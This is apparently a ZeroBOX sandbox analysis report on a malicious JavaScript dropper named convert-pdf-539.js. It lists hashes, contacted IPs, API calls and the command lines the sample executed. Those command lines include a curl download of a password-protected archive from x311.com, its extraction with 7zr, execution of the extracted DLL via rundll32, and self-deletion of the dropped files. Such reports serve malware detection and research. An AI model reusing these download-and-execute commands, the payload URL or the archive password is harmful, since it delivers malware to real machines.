Summary | ZeroBOX

convert-pdf-539.js

Generic Malware, UPX, Malicious Library, Malicious Packer, PE File, OS Processor Check, PE32
Category FILE
Machine s1_win7_x6402
Started Sept. 14, 2023, 2:30 p.m.
Completed Sept. 14, 2023, 2:33 p.m.
Size 43.1KB
Type ASCII text
MD5 0d5009570d1773ecfccf17e6fd65edba
SHA256 bb8ab5d49c2c627362f637dff74ef05446768c84cecc8e37f50fdf70f05e8474
CRC32 1020B648
ssdeep 768:u7wf0Sj3be+hrOrA2hPMye6jEtcfvf8R21nR/LumFaEoPnLxW9:u7wf0e3Z4PXwY
Yara None matched

IP Address Status Action
164.124.101.2 Active Moloch
209.59.190.160 Active Moloch
49.12.202.237 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.3 192.168.56.102:49169 -> 209.59.190.160:443 None None None
TLS 1.3 192.168.56.102:49173 -> 49.12.202.237:443 None None None

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW
  buffer: C:\Users\test22\AppData\Local\Temp>
  console_handle: 0x00000007
  Status 1 Return 1 Repeated 0

WriteConsoleW
  buffer: curl
  console_handle: 0x00000007
  Status 1 Return 1 Repeated 0

WriteConsoleW
  buffer: https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location
  console_handle: 0x00000007
  Status 1 Return 1 Repeated 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx
  Status 1 Return 1 Repeated 0
Time & API Arguments Status Return Repeated

bind
  ip_address: 127.0.0.1
  socket: 144
  port: 0
  Status 1 Return 0 Repeated 0

listen
  socket: 144
  backlog: 1
  Status 1 Return 0 Repeated 0

accept
  ip_address:
  socket: 144
  port: 0
  Status 1 Return 152 Repeated 0

bind
  ip_address: 127.0.0.1
  socket: 144
  port: 0
  Status 1 Return 0 Repeated 0

listen
  socket: 144
  backlog: 1
  Status 1 Return 0 Repeated 0

accept
  ip_address:
  socket: 144
  port: 0
  Status 1 Return 152 Repeated 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory
  process_identifier: 2616
  stack_dep_bypass: 0
  stack_pivoted: 0
  heap_dep_bypass: 0
  length: 4096
  protection: 64 (PAGE_EXECUTE_READWRITE)
  base_address: 0x000007fefa1b7000
  process_handle: 0xffffffffffffffff
  Status 1 Return 0 Repeated 0
file C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat
cmdline cmd.exe /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
cmdline "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
cmdline cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w""
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
cmdline cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\et.o"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
cmdline "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w""
cmdline cmd.exe /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
cmdline "C:\Windows\System32\cmd.exe" /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\et.o"
cmdline "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
file C:\Users\test22\AppData\Local\Temp\et.o
Time & API Arguments Status Return Repeated

ShellExecuteExW
  show_type: 0
  filepath_r: cmd.exe
  parameters: /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
  filepath: cmd.exe
  Status 1 Return 1 Repeated 0

ShellExecuteExW
  show_type: 0
  filepath_r: cmd.exe
  parameters: /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
  filepath: cmd.exe
  Status 1 Return 1 Repeated 0

ShellExecuteExW
  show_type: 0
  filepath_r: cmd.exe
  parameters: /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
  filepath: cmd.exe
  Status 1 Return 1 Repeated 0

ShellExecuteExW
  show_type: 0
  filepath_r: curl
  parameters: https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\et.o"
  filepath: curl
  Status 1 Return 1 Repeated 0

ShellExecuteExW
  show_type: 0
  filepath_r: cmd.exe
  parameters: /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w""
  filepath: cmd.exe
  Status 1 Return 1 Repeated 0

ShellExecuteExW
  show_type: 0
  filepath_r: cmd.exe
  parameters: /c del "C:\Users\test22\AppData\Local\Temp\et.o"
  filepath: cmd.exe
  Status 1 Return 1 Repeated 0

ShellExecuteExW
  show_type: 0
  filepath_r: cmd.exe
  parameters: /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
  filepath: cmd.exe
  Status 1 Return 1 Repeated 0

ShellExecuteExW
  show_type: 0
  filepath_r: cmd.exe
  parameters: /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l"
  filepath: cmd.exe
  Status 1 Return 1 Repeated 0

ShellExecuteExW
  show_type: 0
  filepath_r: rundll32
  parameters: "C:\Users\test22\AppData\Local\Temp\voluptatem.l", scab /k arbalet875
  filepath: rundll32
  Status 1 Return 1 Repeated 0

ShellExecuteExW
  show_type: 0
  filepath_r: cmd.exe
  parameters: /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
  filepath: cmd.exe
  Status 1 Return 1 Repeated 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW
  system_name:
  privilege_name: SeRestorePrivilege
  Status 1 Return 1 Repeated 0

LookupPrivilegeValueW
  system_name:
  privilege_name: SeSecurityPrivilege
  Status 1 Return 1 Repeated 0

LookupPrivilegeValueW
  system_name:
  privilege_name: SeSecurityPrivilege
  Status 1 Return 1 Repeated 0
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\et.o"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\et.o"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
file C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat
file C:\Users\test22\AppData\Local\Temp\cumque.h
file C:\Users\test22\AppData\Local\Temp\et.o
parent_process wscript.exe martian_process cmd.exe /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
parent_process wscript.exe martian_process curl https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\et.o"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\et.o"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\et.o"
parent_process wscript.exe martian_process cmd.exe /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
parent_process wscript.exe martian_process rundll32 "C:\Users\test22\AppData\Local\Temp\voluptatem.l", scab /k arbalet875
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
parent_process wscript.exe martian_process "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\et.o"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l"
parent_process wscript.exe martian_process "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\voluptatem.l", scab /k arbalet875
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
parent_process wscript.exe martian_process cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w""
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w""
parent_process wscript.exe martian_process cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l"
file C:\Windows\System32\cmd.exe
file C:\util\curl\curl.exe
file C:\Windows\System32\rundll32.exe